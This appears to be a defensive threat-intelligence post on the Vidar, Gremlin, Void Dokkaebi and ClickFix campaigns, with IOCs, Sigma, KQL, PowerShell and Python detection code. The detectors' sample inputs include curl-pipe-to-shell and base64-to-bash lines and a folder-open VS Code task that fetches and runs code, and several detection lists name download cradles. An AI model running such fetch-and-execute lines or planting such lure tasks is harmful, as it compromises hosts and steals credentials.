
Vidar v1.5, Gremlin & Void Dokkaebi: Cross-Platform Credential Harvesting & Supply Chain Threats — OTX Pulse Analysis

Security Arsenal Team
May 21, 2026
6 min read

Intelligence from OTX pulses dated 2026-05-21 indicates a surge in credential theft and infrastructure hijacking campaigns. The landscape is dominated by the re-emergence of the Vidar infostealer, rewritten in Go (v1.5) with enhanced evasion, and by Gremlin Stealer, which uses instruction virtualization to hide its logic from static analysis. In parallel, the North Korea-aligned actor Void Dokkaebi (WageMole) is running supply chain attacks against software developers through fake job interviews and poisoned repositories, and a macOS ClickFix campaign is using fake CAPTCHA pages to deploy an AppleScript stealer. The same pulses also track exploitation of Cisco Catalyst SD-WAN vulnerabilities, which is aimed at persistence inside the network perimeter rather than at data exfiltration.

Threat Actor / Malware Profile

Vidar v1.5 (Go)

  • Family: Infostealer (Arkei descendant)
  • Distribution: Malvertising, phishing attachments.
  • Payload Behavior: Native Go PE (7 MB). Steals browser credentials, crypto wallets, and 2FA sessions.
  • C2 Communication: Dead-drop URLs hosted on Telegram and Steam profile pages to bypass network filtering.
  • Anti-Analysis: Heavy sandbox checks (12-category scoring system).

Gremlin Stealer

  • Family: Infostealer (associated with Agent Tesla, Lokibot)
  • Distribution: Spam emails, obfuscated attachments.
  • Payload Behavior: Hides payload within embedded resource files. Siphons payment card details and browser data.
  • C2 Communication: Telegram exfiltration.
  • Anti-Analysis: Commercial packing utility with instruction virtualization (custom bytecode execution via private VM).

Void Dokkaebi (WageMole)

  • Actor: North Korea-aligned (Famous Chollima)
  • Target: Software Developers, Blockchain Infrastructure.
  • Modus Operandi: Fake job interviews lure victims to clone malicious Git repositories.
  • Mechanism: Abuse of VS Code workspace task configurations (.vscode/tasks.) and Git history tampering to execute the DEV#POPPER RAT or OmniStealer. No VS Code vulnerability is involved; the task runs because the victim opens the cloned folder.

macOS ClickFix

  • Platform: macOS / Windows
  • Vector: Fake CAPTCHA pages ("ClickFix")
  • Payload: AppleScript-based infostealer.
  • Behavior: Harvests Keychain databases, 12+ browsers, 200+ extensions, and 16 crypto wallets.
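ClickFix lures, by design, have the victim paste a command into Terminal, so the first forensic artifact on a suspected host is usually the shell history rather than a dropped file. The following is an added Python example (not code from the pulse or from Security Arsenal) that scores shell-history lines: a line that contacts one of the pulse's ClickFix domains is decisive, and otherwise two or more components of the download/decode/execute chain (curl, base64 -d, osascript, pipe-to-shell) mark the line as suspicious. The history lines are constructed samples, not a capture from a real host; the marker patterns are an assumption to tune against your own baseline.

```python
import re
from typing import Dict, List, Optional

IOC_DOMAINS = {"bull-run.fun", "spot-wave.fun"}   # ClickFix domains from the pulse

# Components of the paste-into-Terminal chain; two or more in one line is the signal
# when no known-bad domain is present. Assumed patterns; extend from your own baseline.
CHAIN_MARKERS = {
    "download":      re.compile(r"\b(curl|wget)\b", re.I),
    "decode":        re.compile(r"base64\s+(-d|--decode|-D)\b|echo\s+['\"]?[A-Za-z0-9+/=]{40,}", re.I),
    "exec":          re.compile(r"\b(osascript|bash -c|sh -c|zsh -c|eval)\b", re.I),
    "pipe_to_shell": re.compile(r"\|\s*(ba|z)?sh\b", re.I),
}
DOMAIN_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
ZSH_EXT = re.compile(r"^: (\d+):\d+;(.*)$")   # zsh EXTENDED_HISTORY: ': <epoch>:<duration>;<cmd>'


def parse_history_line(line: str) -> Dict[str, Optional[str]]:
    """Accept a zsh extended-history line or a plain bash history line; returns {ts, cmd}."""
    m = ZSH_EXT.match(line.rstrip("\n"))
    if m:
        return {"ts": m.group(1), "cmd": m.group(2)}
    return {"ts": None, "cmd": line.rstrip("\n")}


def score_command(cmd: str) -> Dict[str, object]:
    """Score one command line: IOC domain contact is decisive, otherwise count chain components."""
    domains = {d.lower() for d in DOMAIN_RE.findall(cmd)}
    ioc_hit = sorted(domains & IOC_DOMAINS)
    markers = [name for name, rx in CHAIN_MARKERS.items() if rx.search(cmd)]
    if ioc_hit:
        verdict = "ioc"
    elif len(markers) >= 2:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, "ioc_domains": ioc_hit, "markers": markers, "domains": sorted(domains)}


def hunt_history(lines: List[str]) -> List[Dict[str, object]]:
    """Run the scorer over history lines and return only non-benign hits with line number and timestamp."""
    out = []
    for n, line in enumerate(lines, 1):
        rec = parse_history_line(line)
        s = score_command(rec["cmd"])
        if s["verdict"] != "benign":
            out.append({"line": n, "ts": rec["ts"], "cmd": rec["cmd"], **s})
    return out


# Constructed sample history (not captured from a real host): two normal commands, an opaque
# base64 blob piped through the shell (flagged even though its domain is unknown), one paste that
# contacts a pulse domain, and a plain bash-format line without a timestamp.
SAMPLE_HISTORY = [
    ": 1716300001:0;git pull",
    ": 1716300002:0;brew install jq",
    ": 1716300003:0;echo 'QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB' | base64 -D | bash",
    ": 1716300004:0;osascript -e 'do shell script \"curl -s https://bull-run.fun/x | sh\"'",
    "ls -la ~/Library/Keychains",
]

if __name__ == "__main__":
    for hit in hunt_history(SAMPLE_HISTORY):
        print(hit["line"], hit["verdict"], hit["markers"], hit["ioc_domains"])
```

To use it on a live host, read `~/.zsh_history` and `~/.bash_history` for every local user (with `errors="replace"`, since zsh history is not always valid UTF-8) and feed the lines to `hunt_history`; the "suspicious" bucket is there to catch the next campaign whose domains are not yet in the pulse.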

IOC Analysis

The provided pulses deliver a mix of infrastructure and file-based indicators requiring immediate operationalization:

  • IP Addresses: Includes a Telegram node (149.154.167.99), a generic VPS host (135.181.237.59), and an SD-WAN exploitation source (176.65.139.31). SOC teams should block the VPS and exploitation IPs at the perimeter and enrich all three with threat intel feeds to identify adjacent infrastructure. Note that 149.154.167.99 sits in Telegram's own address space, so blocking it also blocks legitimate Telegram clients; where Telegram is in business use, alert on connections to it from non-Telegram processes instead of blocking outright.
  • Domains: bull-run.fun and spot-wave.fun are associated with the macOS ClickFix campaign. These should be sinkholed or blocked at the DNS layer.
  • File Hashes: Multiple MD5, SHA1, and SHA256 hashes are provided for Vidar (Go binary), Gremlin (packed), and the macOS AppleScript payloads. Load them into EDR custom indicator lists for block-and-quarantine. The list mixes digest lengths, so any matching logic must compute all three algorithms (or classify each indicator by length) rather than comparing MD5 only.
  • CVEs: While not IOCs themselves, CVE-2026-20182 and CVE-2026-20133 identify the Cisco Catalyst SD-WAN attack surface being exploited for initial access in network environments.

Operational Note: Use YARA rules to detect the Go binary structure of Vidar v1.5 and the specific resource section signatures of Gremlin Stealer, since hash-based matching alone will miss recompiled or repacked variants.
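As a concrete form of the structural check the note calls for, here is an added Python example (not code from the pulse or from Security Arsenal) that locates the Go linker's build-info block in a raw binary and reads the toolchain version out of it. The 14-byte magic and header layout are those of Go's own debug/buildinfo package; a YARA rule keyed on the same magic string gives the equivalent static signature and survives recompilation, which a hash does not. The sample bytes are constructed to mimic a Go 1.18+ PE layout and are not a Vidar sample; any real Go-built file, malicious or not, will trigger it, so treat it as a triage filter rather than a verdict.

```python
from typing import Optional, Tuple

GO_BUILDINFO_MAGIC = b"\xff Go buildinf:"   # 14-byte magic written by the Go linker (Go 1.13+)
HEADER_SIZE = 32                            # fixed header; inline strings (Go 1.18+) start right after


def _read_uvarint(buf: bytes, pos: int) -> Tuple[int, int]:
    """Decode an unsigned LEB128 varint (the encoding Go uses for the length prefix); returns (value, next_pos)."""
    value, shift = 0, 0
    while True:
        if pos >= len(buf):
            raise ValueError("truncated varint")
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7
        if shift > 63:
            raise ValueError("varint too long")


def find_go_buildinfo(data: bytes) -> Optional[dict]:
    """Return {offset, ptr_size, big_endian, version} for a Go-built binary, or None.

    The magic is searched for in the raw bytes rather than resolved through section headers,
    so the same check works on PE, ELF and Mach-O. Binaries older than Go 1.18 store pointers
    to the version string instead of the string itself; the magic alone still proves a Go build.
    """
    idx = data.find(GO_BUILDINFO_MAGIC)
    if idx < 0 or idx + HEADER_SIZE > len(data):
        return None
    ptr_size = data[idx + 14]
    flags = data[idx + 15]          # bit 0: big-endian, bit 1: version/modinfo stored inline
    info = {"offset": idx, "ptr_size": ptr_size, "big_endian": bool(flags & 0x1), "version": None}
    if flags & 0x2:
        try:
            length, pos = _read_uvarint(data, idx + HEADER_SIZE)
            info["version"] = data[pos:pos + length].decode("ascii", "replace")
        except ValueError:
            pass
    return info


def triage(data: bytes) -> str:
    """One-line verdict: PE-or-not plus Go-or-not, matching the 'native Go PE' description in the pulse."""
    is_pe = data[:2] == b"MZ"
    bi = find_go_buildinfo(data)
    if bi is None:
        return "PE, not Go" if is_pe else "not PE, not Go"
    fmt = "PE" if is_pe else "non-PE"
    return f"{fmt} built with Go ({bi['version'] or 'version not inline'}), {bi['ptr_size'] * 8}-bit"


def _fake_go_pe(version: bytes = b"go1.22.3") -> bytes:
    """Constructed sample (not a real binary): an MZ stub, padding, then a Go 1.18+-style build-info block."""
    header = bytearray(GO_BUILDINFO_MAGIC)
    header += bytes([8, 0x2])                       # ptr_size = 8, flags = little-endian | inline strings
    header += b"\x00" * (HEADER_SIZE - len(header))  # reserved bytes up to offset 32
    header += bytes([len(version)]) + version        # uvarint length prefix fits in one byte here
    header += b"\x00"                                # empty module-info string
    return b"MZ" + b"\x90" * 510 + bytes(header) + b"\x00" * 64


if __name__ == "__main__":
    print(triage(_fake_go_pe()))            # PE built with Go (go1.22.3), 64-bit
    print(triage(b"MZ" + b"\x00" * 100))    # PE, not Go
```

Run `find_go_buildinfo(open(path, "rb").read())` over a quarantine directory to separate Go-built samples from the rest before spending analyst time; the version field also lets you cluster samples by toolchain, which is often more stable across a family's releases than any single hash.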

Detection Engineering

YAML
title: Potential Vidar Stealer v1.5 Dead-Drop Resolver Traffic
id: 4f8e2b1a-9c3d-4f5e-8b1a-2c3d4e5f6a7b
description: Detects processes other than known messaging, gaming and browser clients connecting to the Telegram node listed in the pulse or to Telegram/Steam Community profile pages, which Vidar v1.5 uses as dead-drop resolvers for its C2 address. A process_creation event carries no network fields, so this is a network_connection rule; pair it with the Go-binary YARA signature for the executable itself.
status: experimental
date: 2026/05/21
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6648d1a0b1e1b10f2c3e4f5b
tags:
    - attack.command_and_control
    - attack.t1102.001
    - attack.credential_access
logsource:
    category: network_connection
    product: windows
detection:
    selection_ip:
        DestinationIp: '149.154.167.99' # Telegram node from the pulse
    selection_host:
        DestinationHostname|contains:
            - 'steamcommunity.com'
            - 't.me'
    filter_known_clients:
        Image|endswith:
            - '\Telegram.exe'
            - '\steam.exe'
            - '\steamwebhelper.exe'
    filter_browsers:
        Image|endswith:
            - '\chrome.exe'
            - '\msedge.exe'
            - '\firefox.exe'
            - '\brave.exe'
    condition: (selection_ip or selection_host) and not 1 of filter_*
falsepositives:
    - Legitimate applications using the Telegram Bot API or Steam web APIs; add them to the filter after review
level: medium
---
title: VS Code Spawning Download Cradle - Potential Void Dokkaebi Repository Lure
id: 5a9f3c2b-1d4e-5f6a-9b0c-1d2e3f4a5b6c
description: Detects a shell or script host launched by VS Code (as happens when a cloned repository's .vscode/tasks. runs a task on folder open) that in turn fetches, decodes or evaluates a remote payload. The git clone itself happens before VS Code is involved, so clone and package-install commands are deliberately not matched here; the signal is the download cradle under a Code.exe parent.
status: experimental
date: 2026/05/21
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6648d1a0b1e1b10f2c3e4f5b
tags:
    - attack.initial_access
    - attack.execution
    - attack.t1195
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\Code.exe' # Sigma string matching is case-insensitive; one entry covers code.exe
    selection_child:
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\mshta.exe'
            - '\wscript.exe'
            - '\cscript.exe'
    selection_cli:
        CommandLine|contains:
            - 'Invoke-WebRequest'
            - 'DownloadString'
            - 'DownloadFile'
            - 'Invoke-Expression'
            - 'IEX'
            - 'curl '
            - 'certutil'
            - 'bitsadmin'
            - ' -enc'
            - 'FromBase64String'
    condition: selection_parent and selection_child and selection_cli
falsepositives:
    - Build tasks that legitimately fetch tooling over HTTP; baseline per repository and exclude by CommandLine
level: high
---
title: macOS ClickFix AppleScript Network Activity
id: 6b0a4d3c-2e5f-6a7b-0c1d-2e3f4a5b6c7d
description: Detects osascript, curl or an interactive shell on macOS connecting to the domains tied to the ClickFix campaign. The lure has the user paste a command into Terminal, so the first outbound connection usually comes from curl or the shell, with osascript following once the AppleScript stealer runs.
status: experimental
date: 2026/05/21
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6648d1a0b1e1b10f2c3e4f5b
tags:
    - attack.execution
    - attack.t1059.002
    - attack.credential_access
logsource:
    category: network_connection
    product: macos
detection:
    selection_process:
        Image|endswith:
            - '/osascript'
            - '/curl'
            - '/bash'
            - '/zsh'
            - '/sh'
            - '/Terminal'
    selection_domain:
        DestinationHostname|endswith:
            - 'bull-run.fun'
            - 'spot-wave.fun'
    condition: selection_process and selection_domain
falsepositives:
    - Unlikely
level: critical

KQL Hunt (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for ClickFix domains, Vidar/Gremlin C2 IPs and Vidar dead-drop lookups (IOCs from the pulse).
// RemoteUrl holds a URL or hostname, so substring matching is required; an exact 'in' would miss paths and subdomains.
let iocDomains = dynamic(["bull-run.fun", "spot-wave.fun"]);
let iocIPs = dynamic(["149.154.167.99", "135.181.237.59", "176.65.139.31"]);
let knownClients = dynamic(["steam.exe", "steamwebhelper.exe", "chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"]);
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (iocDomains)
    or RemoteIP in (iocIPs)
    // Steam Community profile pages are a Vidar dead-drop resolver; lower confidence, so exclude the usual clients
    or (RemoteUrl has "steamcommunity.com" and InitiatingProcessFileName !in~ (knownClients))
| extend Confidence = iff(RemoteUrl has "steamcommunity.com", "medium", "high")
| project Timestamp, DeviceName, ActionType, RemoteUrl, RemoteIP, RemotePort,
          InitiatingProcessAccountName, InitiatingProcessFileName, InitiatingProcessCommandLine, Confidence
| order by Timestamp desc

PowerShell IOC Hunt Script

PowerShell
<#
.SYNOPSIS
    Hunt script for Vidar, Gremlin, and ClickFix IOCs provided in the OTX pulse.
.DESCRIPTION
    Hashes the image of every running process with MD5, SHA1 and SHA256 (the pulse mixes
    digest lengths, so a single algorithm would silently skip part of the list) and checks
    established TCP connections against the C2 / dead-drop IPs. Run elevated so that the
    image paths of processes owned by other users are readable.
#>
#Requires -RunAsAdministrator

# Indicators from the pulse; lengths 32 (MD5), 40 (SHA1) and 64 (SHA256) are all accepted
$MaliciousHashes = @(
    "702ef1b4007f07887e9faaee0667b50b", # Vidar MD5
    "87332fcdf79e1c0bfb7713e9a52c0313",
    "1bd0a200528c82c6488b4f48dd6dbc818d48782a2e25ccd22781c5718c3f62f5", # Gremlin SHA256
    "e12285f507c847b986233991b86b22e3"  # ClickFix MD5
)
# Case-insensitive set so one lookup per algorithm suffices regardless of hex casing
$HashSet = [System.Collections.Generic.HashSet[string]]::new(
    [string[]]$MaliciousHashes, [System.StringComparer]::OrdinalIgnoreCase)

$MaliciousIPs = @(
    "149.154.167.99", # Telegram node (dead-drop); legitimate Telegram clients will also hit this
    "135.181.237.59",
    "176.65.139.31"
)

Write-Host "[+] Checking running process images against IOC hashes..." -ForegroundColor Cyan
$hashCache = @{}   # image path -> array of three digests; many processes share one image
Get-Process -ErrorAction SilentlyContinue | ForEach-Object {
    $process = $_
    $path = $process.Path
    if (-not $path -or -not (Test-Path -LiteralPath $path)) { return }
    try {
        if (-not $hashCache.ContainsKey($path)) {
            $hashCache[$path] = foreach ($alg in 'MD5', 'SHA1', 'SHA256') {
                (Get-FileHash -LiteralPath $path -Algorithm $alg -ErrorAction Stop).Hash
            }
        }
        foreach ($hash in $hashCache[$path]) {
            if ($HashSet.Contains($hash)) {
                Write-Host "[!] MALICIOUS PROCESS DETECTED: $($process.ProcessName) (PID: $($process.Id)) - Path: $path - Hash: $hash" -ForegroundColor Red
                break
            }
        }
    } catch {
        # Locked or inaccessible images are skipped; surface them with -Verbose so coverage gaps are visible
        Write-Verbose "Could not hash $path : $($_.Exception.Message)"
    }
}

Write-Host "[+] Checking established TCP connections against IOC IPs..." -ForegroundColor Cyan
Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue |
    Where-Object { $MaliciousIPs -contains $_.RemoteAddress } |
    ForEach-Object {
        $owner = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
        $ownerName = if ($owner) { "$($owner.ProcessName) (PID $($owner.Id))" } else { "PID $($_.OwningProcess)" }
        Write-Host "[!] SUSPICIOUS CONNECTION: $ownerName -> $($_.RemoteAddress):$($_.RemotePort)" -ForegroundColor Red
    }

Write-Host "[+] Hunt complete." -ForegroundColor Green

Response Priorities

  • Immediate: Block the pulse IOCs (IPs, domains, hashes) at the perimeter and on endpoints, specifically 135.181.237.59, 176.65.139.31, bull-run.fun, spot-wave.fun and the Vidar/Gremlin hashes. For the Telegram node 149.154.167.99, alert on connections from non-Telegram processes rather than blocking outright if Telegram is in business use.
  • 24 Hours: Reset passwords, SSH keys and personal access tokens, and verify identity, for software developers and staff with access to source code repositories (GitHub/GitLab), given the Void Dokkaebi campaign.
  • 1 Week: Patch the Cisco Catalyst SD-WAN vulnerabilities (CVE-2026-20182, CVE-2026-20133). Enforce VS Code Workspace Trust so that freshly cloned repositories open in Restricted Mode, where automatic tasks do not run; restrict installs to signed VS Code extensions; and audit .vscode/tasks. files in repository commits.
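The Void Dokkaebi mechanism above (a task in the repository's .vscode configuration that executes when the folder is opened) and the audit action in the last priority both come down to one check that can run on a clone before anyone opens it in VS Code. The following is an added Python example (not code from the pulse or from Security Arsenal) that parses VS Code's task file, which VS Code reads from .vscode/tasks.json and allows to contain comments and trailing commas, and flags tasks that auto-run on folder open (runOptions.runOn set to "folderOpen") or whose command and arguments contain download-and-execute patterns. The two task files are constructed samples; the indicator substrings are an assumption to extend from your own baseline, and the example.invalid URL is a placeholder.

```python
import json
import os
import re
from typing import Any, Dict, List

AUTO_RUN_VALUE = "folderOpen"   # runOptions.runOn == "folderOpen" makes VS Code run the task when the folder opens

# Substrings that turn a build task into a download-and-execute cradle (assumed list; tune per repo)
SUSPICIOUS = (
    "curl ", "wget ", "Invoke-WebRequest", "iwr ", "DownloadString", "DownloadFile",
    "Invoke-Expression", "iex ", "base64 -d", "base64 --decode", "FromBase64String",
    " -enc", " -EncodedCommand", "osascript", "mshta", "certutil", "bitsadmin",
    "node -e", "python -c", "| sh", "| bash",
)


def _load_jsonc(text: str) -> Any:
    """tasks.json is JSON-with-comments: strip // and /* */ comments and trailing commas, then parse."""
    try:
        return json.loads(text)
    except json.JSONDecodeError:
        pass
    stripped = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    stripped = re.sub(r"""(^|[^:"'])//[^\n]*""", r"\1", stripped)   # keep '://' inside URLs
    stripped = re.sub(r",\s*([}\]])", r"\1", stripped)
    return json.loads(stripped)


def _command_text(task: Dict[str, Any]) -> str:
    """Flatten command, args and the per-OS overrides (windows/linux/osx) into one searchable string."""
    parts: List[str] = []
    for scope in (task, task.get("windows"), task.get("linux"), task.get("osx")):
        if not isinstance(scope, dict):
            continue
        cmd = scope.get("command")
        if cmd:
            parts.append(cmd if isinstance(cmd, str) else json.dumps(cmd))
        for a in scope.get("args") or []:
            parts.append(a if isinstance(a, str) else json.dumps(a))
    return " ".join(parts)


def audit_tasks_json(text: str, origin: str = "<inline>") -> List[Dict[str, Any]]:
    """Return one finding per task that auto-runs on folder open and/or carries a cradle-like command."""
    findings: List[Dict[str, Any]] = []
    doc = _load_jsonc(text)
    if not isinstance(doc, dict):
        return findings
    for task in doc.get("tasks") or []:
        if not isinstance(task, dict):
            continue
        auto = (task.get("runOptions") or {}).get("runOn") == AUTO_RUN_VALUE
        cmd_text = _command_text(task)
        hits = [s for s in SUSPICIOUS if s.lower() in cmd_text.lower()]
        if auto or hits:
            findings.append({
                "file": origin, "label": task.get("label", "<unnamed>"), "auto_run": auto,
                "indicators": hits, "severity": "high" if (auto and hits) else "medium",
                "command": cmd_text[:200],
            })
    return findings


def scan_repo(root: str) -> List[Dict[str, Any]]:
    """Walk a cloned repository (before opening it in VS Code) and audit every .vscode/tasks.json in it."""
    results: List[Dict[str, Any]] = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        if os.path.basename(dirpath) == ".vscode" and "tasks.json" in filenames:
            path = os.path.join(dirpath, "tasks.json")
            with open(path, encoding="utf-8", errors="replace") as fh:
                results.extend(audit_tasks_json(fh.read(), origin=path))
    return results


# Constructed samples (not from the pulse): a normal build task, and a lure-style task that
# auto-runs on folder open, fetches over HTTPS via node, and carries an encoded PowerShell override.
BENIGN = '{"version": "2.0.0", "tasks": [{"label": "build", "type": "shell", "command": "npm run build"}]}'
LURE = '''{
  // JSONC comment that a strict parser would reject
  "version": "2.0.0",
  "tasks": [{
    "label": "Prepare environment",
    "type": "shell",
    "command": "node -e \\"require('https').get('https://example.invalid/x')\\"",
    "windows": {"command": "powershell", "args": ["-w", "hidden", "-enc", "QQBBAA=="]},
    "runOptions": {"runOn": "folderOpen"},
  }],
}'''

if __name__ == "__main__":
    for f in audit_tasks_json(LURE, "lure/.vscode/tasks.json"):
        print(f["severity"], f["label"], f["indicators"])
```

Wire `scan_repo` into the clone step of your developer onboarding or CI (for example as a pre-open check on any repository received through a recruiting channel); a "high" finding means the folder should be opened only in VS Code's Restricted Mode, if at all.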
